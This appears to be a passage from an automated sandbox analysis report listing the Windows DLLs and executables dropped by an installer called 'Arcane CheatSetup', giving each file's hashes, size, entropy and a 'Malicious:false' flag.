                                SHA1:3BA9B89D9B265D8CEC6B5D6F80F7A28D2030A2D1
                                SHA-256:58914AD5737F2DD3D50418A89ABBB7B30A0BD8C340A1975197EEA02B9E4F25B2
                                SHA-512:091F50B2E621ED80BAFE2541421906DE1BCC35A0E912055B93E40CD903BE8B474103C0D8FECDF46E7F2F3C44BDADE64A857AB2B9CB5404306055150EE4ED002A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19008
                                Entropy (8bit):6.372096409611824
                                Encrypted:false
                                SSDEEP:384:PTjlu57T5J5eFeYW7TPVlN3B+ASZQ4NNR7F3qnYPLr7om0:PnUd5eFeDfd5Sj7oC7om0
                                MD5:4023E25F92B5F13E792901BF112A8EA2
                                SHA1:31ADCD411905832B89EA55DEC8B9C83AF3C7D3EA
                                SHA-256:432AEDAC59FA161FED5A5D95CA5F8CFD1D73A35ABE8A7090D137100F727B687B
                                SHA-512:AD0E6F8071EB09E843989E637BACA988DD7706D84FC26DB7C2E18BBE03A78A6C5BFE4F1B28289B5929B2B86C53FB6C3DAE42523DC8EDE8057A8F431AEA77BB20
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):127552
                                Entropy (8bit):6.413283221897154
                                Encrypted:false
                                SSDEEP:3072:SdQ4jWJt4XChlFavveKSQ4gHK/e2Hrgc6kZAn1y1koKMKy1Zf22QYHJiuzTl8ShM:Sy4SJ1TFavvehc7ZnwEr
                                MD5:C3DED5F41E28FAF89338FB46382E4C3E
                                SHA1:6F77920776D39550355B146D672C199A3941F908
                                SHA-256:4691603DFABE6D7B7BEAC887DADC0E96243C2FF4F9A88CE3793E93356C53AA08
                                SHA-512:23621F2856899F40CFA9858DC277372BFE39F0205377543EB23E94422D479A53FDF664F4A9A4515C2285811F01D91AB64A834A03A4D3AB0CB7D78F8AF11135FF
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.601333059222365
                                Encrypted:false
                                SSDEEP:384:QwiAYZIxsQbbRLEs5Ltd7rpPVJfq0nYPLr7Ko+:BiPZj+bVEmtd7rpdJfnC7J+
                                MD5:73603BF0DC85CAA2F4C4A38B9806EC82
                                SHA1:74EBC4F158936842840973F54AF50CDF46BC9096
                                SHA-256:39EF85AB21F653993C8AAAB2A487E8909D6401A21F27CBA09283B46556FB16AF
                                SHA-512:5C238D677D458D5B7D43FA3FF424E13B62ABFCEDE66D55E3112DC09BF2F7B640EB8F82D00E41A2C7A7E7B36E3FCE3C2DCB060037314418D329466CC462D0BF71
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):116288
                                Entropy (8bit):5.7845827860105885
                                Encrypted:false
                                SSDEEP:3072:UbqmeUF67oaebwU3ta+uHMg9glgFvcfgfgzgG4g9XTXDXp+RuXGXlXdY9vXTXvXQ:8qmeUF67ZeUUVjcIA
                                MD5:5AADADF700C7771F208DDA7CE60DE120
                                SHA1:E9CF7E7D1790DC63A58106C416944FD6717363A5
                                SHA-256:89DAC9792C884B70055566564AA12A8626C3AA127A89303730E66ABA3C045F79
                                SHA-512:624431A908C2A835F980391A869623EE1FA1F5A1A41F3EE08040E6395B8C11734F76FE401C4B9415F2055E46F60A7F9F2AC0A674604E5743AB8301DBADF279F2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126016
                                Entropy (8bit):6.608910794554507
                                Encrypted:false
                                SSDEEP:3072:oOxjjADzd+aeaPB9JhjxkM2wzGdXJbD/jn8Y6:ocKzeaPB9JhjxknwzG5JbDb8F
                                MD5:01706B7997730EAA9E2C3989A1847CA6
                                SHA1:7CEAD73CBE94E824FA5E44429B27069384BFDB41
                                SHA-256:20533C66C63DA6C2D4B66B315FFCF5C93AE5416E3DAE68CDD2047EFE7958AB3A
                                SHA-512:3272C8DE6C32D53372D481441DA81AE2B6EA02E8360B23D7F793B24827BD683A6604F43BE18CE2BEE40038FBE7D5F7AF78B2C465A51F82478D881DBEB5744DC2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.433054716020523
                                Encrypted:false
                                SSDEEP:1536:Rk2X5KQaT9nNrmTTY99ccAlGGzGRulFJWpiDO:RkgUhpmA99ccOGGzGRuPJWpgO
                                MD5:6D05EAD2F6B95C4AFFCFB1B27DC0C188
                                SHA1:0D04A67505D006493F252985AC294B534D271EF2
                                SHA-256:6330591A151E565B5EAB2D174DF8E2F6523A8F403E4E8D8C8DC58D0945881F19
                                SHA-512:DBE98FA16162636039853E9A82CADBE4E6D5A4E6E282A3FBBC122229C314C91E7C445FEB83921EBFE024DC09BC6AA76682F903036A2D2BEA363F1D09DD571B10
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):195136
                                Entropy (8bit):6.80727029211823
                                Encrypted:false
                                SSDEEP:3072:fmtIwyq6lFq857zCYLFYEVothL10xYOXjV5qECVTHLy71vJ2qIcWYEfQQxIYh5t+:mIwyqM7qYLVVIqhfqfTm1W+Tws
                                MD5:E1904A4B2D6F657B9FEF053893FE3C41
                                SHA1:59AC965A1029AE936DDD5AE623A9A025D49737EC
                                SHA-256:5929E3510F67FEAE073B8995BFC542FD7A0626F57D2FBC829EFC95206DF8F85F
                                SHA-512:C0A60928299EA2E6DC8AD1E3DE9CEF77C8E520585F8D73BD7F56E33705D1A2AEC04AE9C01A8069AE5A0D71F28AEF42F4A260CF4D5BB44A95DCEB70E5C8DB8FEA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):453184
                                Entropy (8bit):6.516599034237354
                                Encrypted:false
                                SSDEEP:6144:3J/sbugq7rm5zX2JDYfiA9+wvpsEWcIGnFm8iTFOBITfnvxIW1x8:3JUbzq+5zX25qvdfnFm88nvq+x8
                                MD5:5EDAEFFC60B5F1147068E4A296F6D7FB
                                SHA1:7D36698C62386449A5FA2607886F4ADF7FB3DEEF
                                SHA-256:87847204933551F69F1CBA7A73B63A252D12EF106C22ED9C561EF188DFFCBAE8
                                SHA-512:A691EF121D3AC17569E27BB6DE4688D3506895B1A1A8740E1F16E80EEFCE70BA18B9C1EFD6FD6794FAFC59BA2CAF137B4007FCDC65DDB8BCBFCF42C97B13535B
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):65600
                                Entropy (8bit):6.461111208462538
                                Encrypted:false
                                SSDEEP:1536:lVeogiQWo3IzLIoDY9p6K/sdDAZ5e1x3afX:veDib4oDu4K/sdDAZ5CxEX
                                MD5:806580640A68234A711D3BB0642130A7
                                SHA1:1EDF20DAAC15FE90E9891E95130D0DD70D005B62
                                SHA-256:CCCC2A9F54E4F5961DD45DAA1F6C97ECFB156EA8E0DF82277A2C109EA4D2E036
                                SHA-512:0AAC087449DEECBB1CFAEE5C3144500CDC4C1D209D1F1F7D8EB41DD7870504BF71D0CC9AE7761BFC609F42273B7FB3CA7801AA54FB0E92BC71C41CC5CAECD31C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.576803205025954
                                Encrypted:false
                                SSDEEP:1536:urOHh9t7/GAzqHcGxAARrZT9ixHDyo/r0rV9LrBH1bjPEwhEdheBwHWQFgE/XudL:G+9t7/qHcGHuy/pb
                                MD5:3A744B78C57CFADC772C6DE406B6B31E
                                SHA1:A89BF280453C0BCF8C987B351C168AEB3D7F7141
                                SHA-256:629393079539B1B9849704CE4757714D1CBE5C80E82C6BB3BC4445F4854EFA7B
                                SHA-512:506A147F33C09FA7338E0560F850E42139D0875EF48C297DDB3CC3A29F12822011915FACCB21DA908CF51A462F0EBA56B6B37C71D9C0F842BDE4A697FB4FFB64
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.381906222478272
                                Encrypted:false
                                SSDEEP:192:kNncquU+hyD13XLPVlD6o+N9F5os7USnYe+PjPriT0fwXF27:kNcWp7PVl67/nYPLr7s27
                                MD5:3C9DC0ED8ADD14A0E5B845C1ACC2FF2E
                                SHA1:25C395ADE02199BEDCEE95C65E088B758CD84435
                                SHA-256:367C552FBA3DA5F22791CF8F22B983871639ECD2EF7F5B1880021FE4C4F65EE4
                                SHA-512:4DD5F68180D03B6621E46732F04B47F996B96F91F67845538D1B303E598CCFDB5E4F785A76DE7DFCB8918125FDB06B9068C4EAB06984B5AA9224DCE90190BA1A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):109120
                                Entropy (8bit):5.986571003903383
                                Encrypted:false
                                SSDEEP:1536:LE9WcstxlDgZ9EYDKg0nc6N3MR+EpOB+o+5PVT/B:ghspgZPDanhs+EpOBF+5PFB
                                MD5:A5455B9BEB5672D89B1F0FCFAA4C79CA
                                SHA1:9C7DBB5AD1CB3EBE7347A9CDDD80389902DA81EC
                                SHA-256:89A429889DCD0F6A3FE56217A0FEB5912132AAB2817643021EAE3716DA533D4A
                                SHA-512:131866A4754F4AF78A94F0776815E7EA4375736A4B11A723B87A4436FA101D271FFE14E4B49D3AB1AE2FA61CDBDED0C3D174C75327BE3C24E0E4CC39AFFA9469
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191552
                                Entropy (8bit):6.744419946343284
                                Encrypted:false
                                SSDEEP:3072:lScg0xvhTZNIs3Ft+STckCBQo3C0Y22vncTBfsO9jZqMN3cH1Tefqk:lSclI6nTc3BQo3C0YHncTBxvs65
                                MD5:48C96771106DBDD5D42BBA3772E4B414
                                SHA1:E84749B99EB491E40A62ED2E92E4D7A790D09273
                                SHA-256:A96D26428942065411B1B32811AFD4C5557C21F1D9430F3696AA2BA4C4AC5F22
                                SHA-512:9F891C787EB8CEED30A4E16D8E54208FA9B19F72EEEC55B9F12D30DC8B63E5A798A16B1CCC8CEA3E986191822C4D37AEDB556E534D2EB24E4A02259555D56A2C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):69696
                                Entropy (8bit):6.89860109289213
                                Encrypted:false
                                SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):79936
                                Entropy (8bit):6.675027571633986
                                Encrypted:false
                                SSDEEP:1536:ygRdVzzmTj2iu+wk5eQjBE55W+hYRwZZ3GFjJJ5n5WF:yIfmHsM5j6VqJJ55WF
                                MD5:691B937A898271EE2CFFAB20518B310B
                                SHA1:ABEDFCD32C3022326BC593AB392DEA433FCF667C
                                SHA-256:2F5F1199D277850A009458EDB5202688C26DD993F68FE86CA1B946DC74A36D61
                                SHA-512:1C09F4E35A75B336170F64B5C7254A51461DC1997B5862B62208063C6CF84A7CB2D66A67E947CBBF27E1CF34CCD68BA4E91C71C236104070EF3BEB85570213EC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.609051738644882
                                Encrypted:false
                                SSDEEP:384:mk87qhVj8sqgP7CRLMOPfkGo7UdJs0flkg2uG8RPGHTR5ny5pnYPLr7z:mk87qhVjaMOPJdJFflLJR+V03C7z
                                MD5:7BD914407C6D236B27865A8C63147B7F
                                SHA1:9B49E48705341D30E3F92B85652E924C7985E415
                                SHA-256:549849DC910261D817670B192715430395993E811D0FD3103651237D7F18929D
                                SHA-512:624DC95F696BEA311726EAFB0017F363C8703B95A2E08DE984C642867888CF5B9172326C2E2567ED4A2EA28F806B633840552C80BE49EB6CF2A8FC4A0C259117
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):269888
                                Entropy (8bit):6.418120581797452
                                Encrypted:false
                                SSDEEP:6144:Fp9B0qT85g5Sq+VBY2qVLC2wH5rM8HoQvlHO:5uqT85sSq+ERVm2wZEQvlHO
                                MD5:F8211DB97BF852C3292C3E9C710C19D9
                                SHA1:46DAD07779E030D8D1214AFE11C4526D9F084051
                                SHA-256:ECF4307739CA93F1569CE49377A28B31FE1EB0F44B6950DBAAFA1925B24C9752
                                SHA-512:B3E20EECA87136CAE77F06E4149E65EBFEF71A43589F7E2833008FE43811A2BC8B6202B6ADB5CE122A1822E83CE226B833DEF93A2B161476BD5B623794E4F697
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25664
                                Entropy (8bit):6.488681310308951
                                Encrypted:false
                                SSDEEP:384:GxZ2v7Oc56lspQEgde9M3z27lFOJIjkzIPV5yKlWFKbKwnYPLr7Wo5L:Xr5PQEOe9MD4lFhjk8ddeKWwC7dL
                                MD5:039AD8A7A4B14C321F156878838A2340
                                SHA1:6AD9D2FBA988193D16E7B3278C0D0757AB99B3EF
                                SHA-256:ED3AD7EBA989FB31C2ABC3220694D1446D33659782CB1B333318EC54A577389D
                                SHA-512:7D5B8C191A7D0C4FEDB831DE197A3CB5DC0564AD3F2E57EEE8C506B2308B656D2F0FE086D508FAB8F03CA0E1B0574E708728373DFA3116C9B9FC5DFDB72FEE46
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.4868701533420925
                                Encrypted:false
                                SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                MD5:7C2959F705B5493A9701FFD9119C5EFD
                                SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477340414037824
                                Encrypted:false
                                SSDEEP:384:Gps45cnk6LlmSHhV8i+ceek4SzS+nYPLr7wd:Gpsnn5AS/8jZek7C7wd
                                MD5:4DE6BFE6EA98BC42A5358ED8307107B2
                                SHA1:8F687E60784FD9046A361DC1DC85D43051CBD577
                                SHA-256:7C07D167AA4A23AB64A205301663C87E578FF6B31985DF8B51AF80CA6999176F
                                SHA-512:8091AADEACAD1DAC5191EBB996D1E4BE25A19C10A4E76F79AB7EA2A592711FD39AAD7E89D7DEE09385296AA7A649AABFA7C325C4A627AFE1C009C906709EDB5A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):200768
                                Entropy (8bit):6.431501859060678
                                Encrypted:false
                                SSDEEP:3072:lC0MaRHVsSduCCkNlKpR1FHNnuNcCwJPT54l2B3Fzkmldrz5ZD9hYJOj9T3iRK:s0XR1sYtxgGl2B3uWjhYJOj9TSY
                                MD5:434CBB561D7F326BBEFFA2271ECC1446
                                SHA1:3D9639F6DA2BC8AC5A536C150474B659D0177207
                                SHA-256:1EDD9022C10C27BBBA2AD843310458EDAEAD37A9767C6FC8FDDAAF1ADFCBC143
                                SHA-512:9E37B985ECF0B2FEF262F183C1CD26D437C8C7BE97AA4EC4CD8C75C044336CC69A56A4614EA6D33DC252FE0DA8E1BBADC193FF61B87BE5DCE6610525F321B6DC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475930674615241
                                Encrypted:false
                                SSDEEP:384:GpsFG5BnK6xmSHhV8TCeeX4SzREnYPLr7Ggp:Gpsen0S/8TveXUC7jp
                                MD5:31C0CED43A07A2DFF3AFC557EBABBE0F
                                SHA1:9100A7393B919EB35C79CE16A559D783219E2F20
                                SHA-256:B93D0D62436D89C84C66ABBDCF817084A6BA01F7E10053C8F343DF5D53D37536
                                SHA-512:716818BBF6E4F21C2A627259F1D35E8375EFEF9C3B197B3AF6E10A4A1735CC643141C32270DF7F6FE25733517BE38CAA09205B98119996237E8EAE6A7D0825A7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.1347115439165085
                                Encrypted:false
                                SSDEEP:192:0Usw4DPU3XLPVT6GsKOhWIutUinYe+PjPriT0fwyI8:ew7PVIKyWIutDnYPLr728
                                MD5:B4EB9B43C293074406ADCA93681BF663
                                SHA1:16580FB7139D06A740F30D34770598391B70AC96
                                SHA-256:8CD69AF7171F24D57CF1E6D0D7ACD2B35B4EA5FDF55105771141876A67917C52
                                SHA-512:A4E999E162B5083B6C6C3EAFEE4D84D1EC1C61DCA6425F849F352FFDCCC2E44DFEE0625C210A8026F9FF141409EEBF9EF15A779B26F59B88E74B6A2CE2E82EF9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115776
                                Entropy (8bit):6.787384437276838
                                Encrypted:false
                                SSDEEP:1536:0LHPDcdivqC4xMfl/hAxfZ/t0QHQIM7iVxoQCpGlyir0wIOfnToIfemrVZQirM:0rPDco4xMNEfZ1LQG4igmvTBfem7QcM
                                MD5:AB6ED0CFD0C52DBEDE1BE910EFA8A89B
                                SHA1:83CBC2746A50C155261407ECE3D7A5C58AAD0437
                                SHA-256:8A6FBB08E0F418A3BB80CC65233E7270C820741DD57525ED7FD3CC479A49396E
                                SHA-512:41773183FC20E42BF208064163AA55658692B9221560146E4F6A676F96FC76541ED82F1EFDFA31F8C25BA42F271F7D9087DE681DA937BBF0EB2C781E027F1218
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33344
                                Entropy (8bit):6.5580840927675945
                                Encrypted:false
                                SSDEEP:768:5TuVpsEkV3/azbYJHf2ZdCwhxKdv0tCFC7dRb:5YQV3/az8x2HCSScC4dRb
                                MD5:EFF31A13A4A5D3E9A5BD36E7349D028B
                                SHA1:8E47BE8C1CE4DFD73B7041679E96EA4A17DDB4C0
                                SHA-256:307B816892FDD9BAD9E28953E1BBB4BCE35C8F8CA783C369D7EB52A22BCC4229
                                SHA-512:72148C757624868D3866C40B31149CCA171737D82ADBCDF2C8FB03A9D8F3C1CEA2B2FC5137DD11DAAD2328D3AF8FAE43568DCCD843664BC43323F9357B67B6A0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475020301731584
                                Encrypted:false
                                SSDEEP:384:GpsE5cnm6ObmSHhV8j0eeq4SziahnYPLr79OOu:Gpszn6iS/8jxeqfhC78Ou
                                MD5:4F11D43AA2215CE771DA528878F01C8E
                                SHA1:8062681D73489FF200CA0BA426FF1FF3F44494A7
                                SHA-256:0D554CD4B373D6D9B9C179A468D179388706C0BDE4D878ED75EF575651588B3C
                                SHA-512:34CB271C32FB479CFAEEC536A5D35A41730E90001D67DC9DB595DB240A1F58C3BF12334BB5CDE7673C8E56A4C272BFBD66E4EACDEE0082F6FD583E4E039EC540
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):223296
                                Entropy (8bit):6.501845596055873
                                Encrypted:false
                                SSDEEP:6144:8P8OC0xbNXLJAEh4hijzud6kAgZkFGMReiDfbgOBI1:8P8OC0xbNXLJAEh4hijzud6kAgYGSA
                                MD5:9D5EDECF7E33DDD0E2A6A0D34FC12CA1
                                SHA1:FC228A80FF85D78AA5BFBA2515EFED3257B9B009
                                SHA-256:6D817519C2E2EFDD3986EB655C1F687D4774730AB20768DF1C0AAEF03B110965
                                SHA-512:B4D58D3415D0255DCD87EF413762BC0F2934AAA6C8151344266949D3DD549ABDCA1366FA751A988CDDC1430EBF5D17668ADF02096DD4D5EAFE75604C0DA0B4C9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33934912
                                Entropy (8bit):6.35314231534845
                                Encrypted:false
                                SSDEEP:393216:VJ8d7SMzwH5R2sdDcBwHHdI4DKRlDsqXCagQZhzvilh2Wlq7ODI:VJ8d7zzUesdDtevn
                                MD5:4D857A5FC9CA16D2A67872FACCF85D9F
                                SHA1:EAEB632E526EFA946E4DB1B8CFA31DE6A7B03219
                                SHA-256:7FFA7423DDA07499394B345E5ECE2D54C8E19247E6E76C0E23B5BF1470AB0D7F
                                SHA-512:8DBC8675CE2DACE8D629C3FA66CF65704346AB829AE0B0A1D7B25BE22783B7E73624BA70F6D67264D6CA1656D7590E3753A8DF2227DA45112C5BD4A5654089AF
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):186944
                                Entropy (8bit):6.612459610032652
                                Encrypted:false
                                SSDEEP:3072:XsSFQQB7SGWV2xrkvql6QPJD7mGVqjLypDTaDE5zwmFxy7HglbZrdIG:XJ97PxYAPJ/RV0tDCzw+xy0ldOG
                                MD5:E9373908186D0DA1F9EAD4D1FDAD474B
                                SHA1:C835A6B2E833A0743B1E8F6F947CFE5625FE791F
                                SHA-256:E2FBD6C6334D4765FF8DFF5C5FE3DF8B50015D0BF9124142748FADB987B492FF
                                SHA-512:BFDC236D462DAC45FD63C112E40558ED4E11E76FB4D713926A679FD573F67FA16451231A03178926B76BD267F092A33A3B6760CF4812DE2679BB9505B83F8261
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):446528
                                Entropy (8bit):6.603555069382601
                                Encrypted:false
                                SSDEEP:12288:RreTVhY4gXwLR4YS+OX3kQg4O5kM2LY58gwDTxXvwGSelo:Rr4VhyK7eTxXvwelo
                                MD5:8AE40822B18B10494527CA3842F821D9
                                SHA1:202DFFA7541AD0FAD4F0D30CEE8C13591DCA5271
                                SHA-256:C9742396B80A2241CE5309C388B80000D0786A3CAB06A37990B7690FD0703634
                                SHA-512:AA324A265639C67843B4BF6828029B413044CBE4D7F06A253B78B060EA554FECC6E803D59D03742C485B2EB3D52E5C0A44928DCC927501F413EE4664BB8A11F5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):142912
                                Entropy (8bit):7.350682736920136
                                Encrypted:false
                                SSDEEP:3072:aoGzTjLkRPQ9U9NuLqcNicj5ojGylYCE2Iu2jGLF5A9bE8LUekfCz:LGz/oRPGLJN1IGgYCE2L1F5A9bEGUeR
                                MD5:4BDC32EF5DA731393ACC1B8C052F1989
                                SHA1:A677C04ECD13F074DE68CC41F13948D3B86B6C19
                                SHA-256:A3B35CC8C2E6D22B5832AF74AAF4D1BB35069EDD73073DFFEC2595230CA81772
                                SHA-512:E71EA78D45E6C6BD08B2C5CD31F003F911FD4C82316363D26945D17977C2939F65E3B9748447006F95C3C6653CE30D2CDA67322D246D43C9EB892A8E83DEB31A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):39488
                                Entropy (8bit):6.751057397220933
                                Encrypted:false
                                SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                MD5:DE2167A880207BBF7464BCD1F8BC8657
                                SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):123968
                                Entropy (8bit):6.699694377005066
                                Encrypted:false
                                SSDEEP:1536:jWi/SLhxEJKv0O4+zwtKg3HquHB2u0YUdRXGCDilgKptxG0ULtt1vtxgl0IlgqA2:+vdtg6ZYUniPe5vtxgl0IlgqA2
                                MD5:0BAB62A0CF67481EA2A7F3CAFD7C5144
                                SHA1:D6B010C815F4D9C675DF918B615FE0AAE45249EA
                                SHA-256:FC57682FDBCA50FAEBFC6B4F5D199FC407A541C110C15F0C850503006D32301A
                                SHA-512:0128813DE247246BF4AECE1B222B6611E5AE1EDE01A1B339CFE0F98184739D7A066DAE4F1A271F544BB39F9B79F053F4B96F2E471B9444C29855CF52FB7835CB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475447140204412
                                Encrypted:false
